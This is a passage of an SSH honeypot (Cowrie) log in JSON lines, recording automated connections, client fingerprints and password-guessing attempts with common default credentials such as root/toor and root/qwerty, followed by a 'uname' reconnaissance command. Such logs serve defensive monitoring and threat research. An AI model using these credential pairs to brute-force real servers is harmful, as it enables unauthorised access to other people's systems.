openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:37:44.376226Z","src_ip":"212.227.125.160","session":"65923fdb9395"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy123","message":"login attempt [deploy/deploy123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:37:45.015743Z","src_ip":"212.227.125.160","session":"65923fdb9395"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:37:46.231117Z","src_ip":"212.227.125.160","session":"65923fdb9395"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":29359,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b8d816683db","protocol":"ssh","message":"New connection: 45.125.211.194:29359 (1.2.3.4:22) [session: 0b8d816683db]","sensor":"my-vps","timestamp":"2025-08-28T03:37:46.674387Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:37:46.683090Z","src_ip":"45.125.211.194","session":"0b8d816683db"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:37:46.893312Z","src_ip":"45.125.211.194","session":"0b8d816683db"}
{"eventid":"cowrie.login.failed","username":"developer","password":"developer","message":"login attempt [developer/developer] failed","sensor":"my-vps","timestamp":"2025-08-28T03:37:47.723601Z","src_ip":"45.125.211.194","session":"0b8d816683db"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:37:48.936116Z","src_ip":"45.125.211.194","session":"0b8d816683db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33186,"dst_ip":"1.2.3.4","dst_port":22,"session":"c227b30bce26","protocol":"ssh","message":"New connection: 212.227.125.160:33186 (1.2.3.4:22) [session: c227b30bce26]","sensor":"my-vps","timestamp":"2025-08-28T03:37:49.995096Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:37:49.996257Z","src_ip":"212.227.125.160","session":"c227b30bce26"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:37:50.211845Z","src_ip":"212.227.125.160","session":"c227b30bce26"}
{"eventid":"cowrie.login.success","username":"root","password":"toor","message":"login attempt [root/toor] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:37:50.860564Z","src_ip":"212.227.125.160","session":"c227b30bce26"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:37:51.311463Z","src_ip":"212.227.125.160","session":"c227b30bce26"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:37:51.312116Z","src_ip":"212.227.125.160","session":"c227b30bce26"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:37:51.529357Z","src_ip":"212.227.125.160","session":"c227b30bce26"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:37:51.530581Z","src_ip":"212.227.125.160","session":"c227b30bce26"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54508,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbd6f8b000b1","protocol":"ssh","message":"New connection: 212.227.235.229:54508 (1.2.3.4:22) [session: dbd6f8b000b1]","sensor":"my-vps","timestamp":"2025-08-28T03:37:58.330387Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:37:58.331365Z","src_ip":"212.227.235.229","session":"dbd6f8b000b1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:37:58.584544Z","src_ip":"212.227.235.229","session":"dbd6f8b000b1"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty","message":"login attempt [root/qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:37:59.347082Z","src_ip":"212.227.235.229","session":"dbd6f8b000b1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:37:59.928850Z","src_ip":"212.227.235.229","session":"dbd6f8b000b1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:37:59.929533Z","src_ip":"212.227.235.229","session":"dbd6f8b000b1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:38:00.184282Z","src_ip":"212.227.235.229","session":"dbd6f8b000b1"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:38:00.185407Z","src_ip":"212.227.235.229","session":"dbd6f8b000b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54064,"dst_ip":"1.2.3.4","dst_port":22,"session":"86e9b3283aa1","protocol":"ssh","message":"New connection: 212.227.125.160:54064 (1.2.3.4:22) [session: 86e9b3283aa1]","sensor":"my-vps","timestamp":"2025-08-28T03:38:01.278192Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:38:01.279419Z","src_ip":"212.227.125.160","session":"86e9b3283aa1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:38:01.494609Z","src_ip":"212.227.125.160","session":"86e9b3283aa1"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":38815,"dst_ip":"1.2.3.4","dst_port":22,"session":"93e4163ef87d","protocol":"ssh","message":"New connection: 45.125.211.194:38815 (1.2.3.4:22) [session: 93e4163ef87d]","sensor":"my-vps","timestamp":"2025-08-28T03:38:01.522347Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:38:01.545863Z","src_ip":"45.125.211.194","session":"93e4163ef87d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:38:01.733851Z","src_ip":"45.125.211.194","session":"93e4163ef87d"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123qwe","message":"login attempt [oracle/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-28T03:38:02.150327Z","src_ip":"212.227.125.160","session":"86e9b3283aa1"}
{"eventid":"cowrie.login.success","username":"root","password":"Passw0rd","message":"login attempt [root/Passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:38:02.563460Z","src_ip":"45.125.211.194","session":"93e4163ef87d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:38:03.075311Z","src_ip":"45.125.211.194","session":"93e4163ef87d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:38:03.076243Z","src_ip":"45.125.211.194","session":"93e4163ef87d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:38:03.301663Z","src_ip":"45.125.211.194","session":"93e4163ef87d"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:38:03.302819Z","src_ip":"45.125.211.194","session":"93e4163ef87d"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:38:03.367280Z","src_ip":"212.227.125.160","session":"86e9b3283aa1"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":38826,"dst_ip":"1.2.3.4","dst_port":22,"session":"484b0c676f61","protocol":"ssh","message":"New connection: 45.125.211.194:38826 (1.2.3.4:22) [session: 484b0c676f61]","sensor":"my-vps","timestamp":"2025-08-28T03:38:16.491039Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:38:16.517078Z","src_ip":"45.125.211.194","session":"484b0c676f61"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:38:16.704314Z","src_ip":"45.125.211.194","session":"484b0c676f61"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"123456","message":"login attempt [ftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:38:17.533188Z","src_ip":"45.125.211.194","session":"484b0c676f61"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:38:18.743940Z","src_ip":"45.125.211.194","session":"484b0c676f61"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50240,"dst_ip":"1.2.3.4","dst_port":22,"session":"8393f9c28637","protocol":"ssh","message":"New connection: 212.227.235.229:50240 (1.2.3.4:22) [session: 8393f9c28637]","sensor":"my-vps","timestamp":"2025-08-28T03:38:26.916057Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:38:26.917390Z","src_ip":"212.227.235.229","session":"8393f9c28637"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:38:27.167878Z","src_ip":"212.227.235.229","session":"8393f9c28637"}
{"eventid":"cowrie.login.success","username":"root","password":"root@123","message":"login attempt [root/root@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:38:27.918465Z","src_ip":"212.227.235.229","session":"8393f9c28637"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:38:28.435510Z","src_ip":"212.227.235.229","session":"8393f9c28637"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:38:28.436175Z","src_ip":"212.227.235.229","session":"8393f9c28637"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:38:28.687848Z","src_ip":"212.227.235.229","session":"8393f9c28637"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:38:28.688912Z","src_ip":"212.227.235.229","session":"8393f9c28637"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":40531,"dst_ip":"1.2.3.4","dst_port":22,"session":"2babbf9e6800","protocol":"ssh","message":"New connection: 45.125.211.194:40531 (1.2.3.4:22) [session: 2babbf9e6800]","sensor":"my-vps","timestamp":"2025-08-28T03:38:31.322764Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:38:31.335608Z","src_ip":"45.125.211.194","session":"2babbf9e6800"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:38:31.535629Z","src_ip":"45.125.211.194","session":"2babbf9e6800"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"mongodb","message":"login attempt [mongodb/mongodb] failed","sensor":"my-vps","timestamp":"2025-08-28T03:38:32.365220Z","src_ip":"45.125.211.194","session":"2babbf9e6800"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60680,"dst_ip":"1.2.3.4","dst_port":22,"session":"bcce3187b9dd","protocol":"ssh","message":"New connection: 212.227.235.229:60680 (1.2.3.4:22) [session: bcce3187b9dd]","sensor":"my-vps","timestamp":"2025-08-28T03:38:32.618760Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:38:32.619528Z","src_ip":"212.227.235.229","session":"bcce3187b9dd"}
